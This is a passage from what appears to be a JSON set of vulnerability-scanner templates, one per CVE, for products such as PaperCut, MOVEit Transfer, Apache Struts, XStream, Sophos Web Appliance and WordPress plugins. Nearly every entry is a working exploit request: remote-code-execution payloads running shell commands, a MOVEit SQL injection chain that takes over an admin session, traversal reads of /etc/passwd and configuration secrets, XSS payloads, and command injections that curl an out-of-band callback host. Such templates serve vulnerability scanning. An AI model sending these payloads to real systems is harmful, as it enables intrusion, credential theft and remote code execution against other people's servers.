application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["email-description","Username"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39143","info":{"name":"PaperCut < 22.1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"],"matchers":[{"type":"dsl","dsl":["content_length == 1655","status_code == 200","contains(to_lower(content_type), \"image/png\")","contains(hex_encode(body), \"89504e470d0a1a0a\")"],"condition":"and"}]}]},{"id":"CVE-2023-20888","info":{"name":"VMware Aria Operations for Networks - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/events/push-notifications HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: application/json\n\n{\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-0297","info":{"name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","severity":"critical"},"requests":[{"raw":["GET /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\n","POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["JDownloader"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-2252","info":{"name":"Directorist < 7.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1671","info":{"name":"Sophos Web Appliance - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?c=blocked&action=continue HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargs_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-24735","info":{"name":"PMB 7.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5('https://oast.me')}}"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-24367","info":{"name":"Temenos T24 R20 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/genrequest.jsp?routineName=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>Processing...</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35082","info":{"name":"MobileIron Core - Remote Unauthenticated API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/asfV3/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27350","info":{"name":"PaperCut - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /app?service=page/SetupCompleted HTTP/1.1\nHost: {{Hostname}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update\n","GET /app?service=page/PrinterList HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=page%2FPrinterList\n","POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Avanceret kontering"]}],"extractors":[{"type":"regex","name":"printerID","group":1,"regex":["erList\\/selectPrinterCost&amp;sp=([a-z0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2272","info":{"name":"Tiempo.com <= 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Tiempo\")"],"condition":"and"}]}]},{"id":"CVE-2023-34362","info":{"name":"MOVEit Transfer - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nCookie: siLockLongTermInstID=0\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyUsername: Guest\nX-siLock-SessVar1: MyPkgAccessCode: 123\nX-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com\nCookie: siLockLongTermInstID=0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: siLockLongTermInstID=0\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nArg06=123\n","@Host: https://checkip.amazonaws.com\nGET / HTTP/1.1\nHost: checkip.amazonaws.com\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyPkgID: 0\nX-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf\nCookie: siLockLongTermInstID=0\nContent-Length: 0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0\nContent-Type: application/x-www-form-urlencoded\n\nCsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40example.com&Arg09=attachment_list\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{sessioncookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_7","words":["{\"access_token\":"]},{"type":"word","part":"header_7","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ips","regex":["\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"],"internal":true},{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrftoken\" value=\"(\\w+)\">"],"internal":true,"part":"body"},{"type":"regex","name":"access_token","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body"}]}]},{"id":"CVE-2023-2023","info":{"name":"Custom 404 Pro < 3.7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2023-23492","info":{"name":"Login with Phone Number - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","message\":\"Update password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23752","info":{"name":"Joomla! Webservice - Password Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/index.php/v1/config/application?public=true","{{BaseURL}}/api/v1/config/application?public=true"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"links\":","\"attributes\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json","application/vnd.api+json"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35078","info":{"name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/aad/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-33338","info":{"name":"Old Age Home Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=vaday%27+or+1%3D1%23&password=password&submit=\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Change Password\")","contains(body_2, \"Old Age Home Management System|| Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-3479","info":{"name":"Hestiacp <= 1.7.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["debug-panel","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2248","info":{"name":"Apache Struts - Multiple Open Redirection Vulnerabilities","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.action?redirect:http://www.interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-7091","info":{"name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00","{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","words":["zimbra_server_hostname","zimbra_ldap_userdn","zimbra_ldap_password","ldap_postfix_password","ldap_amavis_password","ldap_nginx_password","mysql_root_password"],"condition":"or"},{"type":"regex","regex":["root=.*:0:0"]}]}]},{"id":"CVE-2013-7240","info":{"name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2287","info":{"name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4117","info":{"name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5528","info":{"name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2251","info":{"name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"params":["redirect","action","redirectAction"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200,400],"condition":"or"}]}]},{"id":"CVE-2013-1965","info":{"name":"Apache Struts2 S2-012 RCE","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/user.action"],"body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5979","info":{"name":"Xibo 1.2.2/1.4.1 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3526","info":{"name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4625","info":{"name":"WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2621","info":{"name":"Telaen => v1.3.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/telaen/redir.php?https://interact.sh","{{BaseURL}}/redir.php?https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-6281","info":{"name":"WordPress Spreadsheet - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["page: '<script>alert(document.domain)</script>'","dhx_rel_path"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3827","info":{"name":"Javafaces LFI","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7285","info":{"name":"XStream <1.4.6/1.4.10 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <contact class='dynamic-proxy'>\n      <interface>java.lang.Comparable</interface>\n      <handler class='java.beans.EventHandler'>\n          <target class='java.lang.ProcessBuilder'>\n              <command>\n                <string>curl</string>\n                <string>http://{{interactsh-url}}</string>\n              </command>\n          </target>\n          <action>start</action>\n      </handler>\n  </contact>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-32172","info":{"name":"Maian Cart <=3.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n","GET /product-downloads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-33044","info":{"name":"Dahua IPC/VTH/VTO - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /RPC2_Login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nConnection: close\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\"id\": 1, \"method\": \"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":true","id","params","session"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[",\"result\":true,\"session\":\"([a-z]+)\"\\}"],"part":"body"}]}]},{"id":"CVE-2021-35250","info":{"name":"SolarWinds Serv-U 15.3 - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n/?Command=NOOP\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24862","info":{"name":"WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"rm_user_role_mananger_form\")"],"condition":"and"}]}]},{"id":"CVE-2021-34429","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /%u002e/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /.%00/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: 